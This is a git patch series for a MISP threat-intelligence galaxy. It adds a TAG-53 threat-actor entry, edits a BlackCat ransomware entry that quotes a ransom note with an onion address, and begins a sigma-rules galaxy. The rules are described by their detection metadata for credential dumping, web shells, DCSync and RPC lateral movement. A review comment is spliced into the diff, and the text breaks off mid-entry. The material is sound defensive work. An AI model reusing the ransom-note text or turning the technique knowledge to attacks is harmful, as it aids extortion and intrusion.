From 5931f51d7a1cc99030026ecb8ac9114b5ad61616 Mon Sep 17 00:00:00 2001
From: Delta-Sierra
Date: Thu, 8 Dec 2022 11:31:02 +0100
Subject: [PATCH 01/13] add TAG-53

---
 clusters/ransomware.json | 5 +++--
 clusters/threat-actor.json | 23 ++++++++++++++++++++++-
 2 files changed, 25 insertions(+), 3 deletions(-)

diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index 8331c35..d1f599c 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -24381,7 +24381,8 @@
 "https://www.varonis.com/blog/alphv-blackcat-ransomware",
 "https://www.intrinsec.com/alphv-ransomware-gang-analysis",
 "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
- "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat"
+ "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat",
+ "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
 ],
 "synonyms": [
 "ALPHV",
@@ -24724,7 +24725,7 @@
 "ransomnotes": [
 "Your data are stolen and encrypted\nThe data will be published on TOR website if you do not pay the ransom\nYou can contact us and decrypt one file for free on this TOR site (you should download and install TOR browser first https://torproject.org) https://aazsbsgya565y1u2c6Lay6yfiebkcbtvvcytyolt33s77xypi7nypxyd.onion/ \n\nYour company id for log in: [REDACTED]"
 ],
- "ransomnotes-files": [
+ "ransomnotes-filenames": [
 "readme.txt"
 ],
 "ransomnotes-refs": [
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index c5d73f0..3aa75c7 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -9943,7 +9943,28 @@
 },
 "uuid": "171d0590-be92-443f-addb-af5dc2a8034d",
 "value": "Evasive Panda"
+ },
+ {
+ "description": "A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.",
+ "meta": {
+ "refs": [
+ "https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies",
+ "https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "fbd279ab-c095-48dc-ba48-4bece3dd5b0f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "overlaps"
+ }
+ ],
+ "uuid": "e5865ca1-ec95-43e2-954a-d0f3507a9747",
+ "value": "TAG-53"
 }
 ],
- "version": 255
+ "version": 256
 }

From cb19f6bda70da248f344a2d4451c2694de336b2a Mon Sep 17 00:00:00 2001
From: jstnk9
Date: Fri, 9 Dec 2022 08:48:54 +0100
Subject: [PATCH 02/13] galaxy for sigma rules

---
 clusters/sigma-rules.json | 63262 ++++++++++++++++++++++++++++++++++++
 galaxies/sigma-rules.json | 9 +
 2 files changed, 63271 insertions(+)
 create mode 100644 clusters/sigma-rules.json
 create mode 100644 galaxies/sigma-rules.json

diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json
new file mode 100644
index 0000000..a94cb72
--- /dev/null
+++ b/clusters/sigma-rules.json
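Review bot: The second `refs` entry of the new TAG-53 object carries social-share tracking parameters (`?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=...`) that are not part of the source; store the canonical URL `"https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations"` so the reference deduplicates against other clusters citing the same report and does not leak the share channel into the galaxy. The `related` entry links `dest-uuid` `fbd279ab-c095-48dc-ba48-4bece3dd5b0f` with `"type": "overlaps"`, while the description names Callisto Group, COLDRIVER and SEABORGIUM as the overlapping tracking names; the hunk alone cannot show that this UUID resolves to that cluster, so it is worth confirming before merge. If Callisto Group, COLDRIVER and SEABORGIUM are meant as alternative names for the same activity rather than a separate cluster, a `"synonyms"` array under `meta` would make them searchable, which the `related` link does not.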
@@ -0,0 +1,63262 @@ +{ + "authors": [ + "@Joseliyo_Jstnk" + ], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "values": [ + { + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2018/09/09", + "filename": "av_exploiting.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2021/08/16", + "filename": "av_hacktool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + 
"value": "Antivirus Password Dumper Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" + ], + "creation_date": "2018/09/09", + "filename": "av_password_dumper.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection", + "meta": { + "refs": [ + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/01", + "filename": "av_printernightmare_cve_2021_34527.yml", + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unlikely, or pending PSP analysis" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports ransomware", + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus 
Ransomware Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" + ], + "tags": [ + "attack.t1486" + ], + "creation_date": "2022/05/12", + "filename": "av_ransomware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ], + "creation_date": "2018/09/09", + "filename": "av_relevant_files.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. 
github and checking the matches.", + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2018/09/09", + "filename": "av_webshell.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions", + "meta": { + "refs": [ + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/05", + "filename": "appframework_django_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "django" + } + }, + { + "description": "Generic rule for SQL exceptions in Python according to PEP 249", + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions", + "meta": { + "refs": [ + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/12", + "filename": "app_python_sql_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "python" + } + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + 
"attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_atsvc_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", + 
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_dcsync_attack.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_efs_abuse.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + "value": "Remote Event Log Recon", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_eventlog_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + 
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_printing_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Actual 
printing" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administration of registry values" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to collect information", + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_registry_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administration of registry values" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_server_service_abuse.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Legitimate remote share creation" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + "value": "Remote Server Service Abuse for Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_service_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to create 
or execute a scheduled task via SASec", + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sasec_recon.yml", + "author": "Sagie Dulce, Dekel 
Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sharphound_recon_account.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects 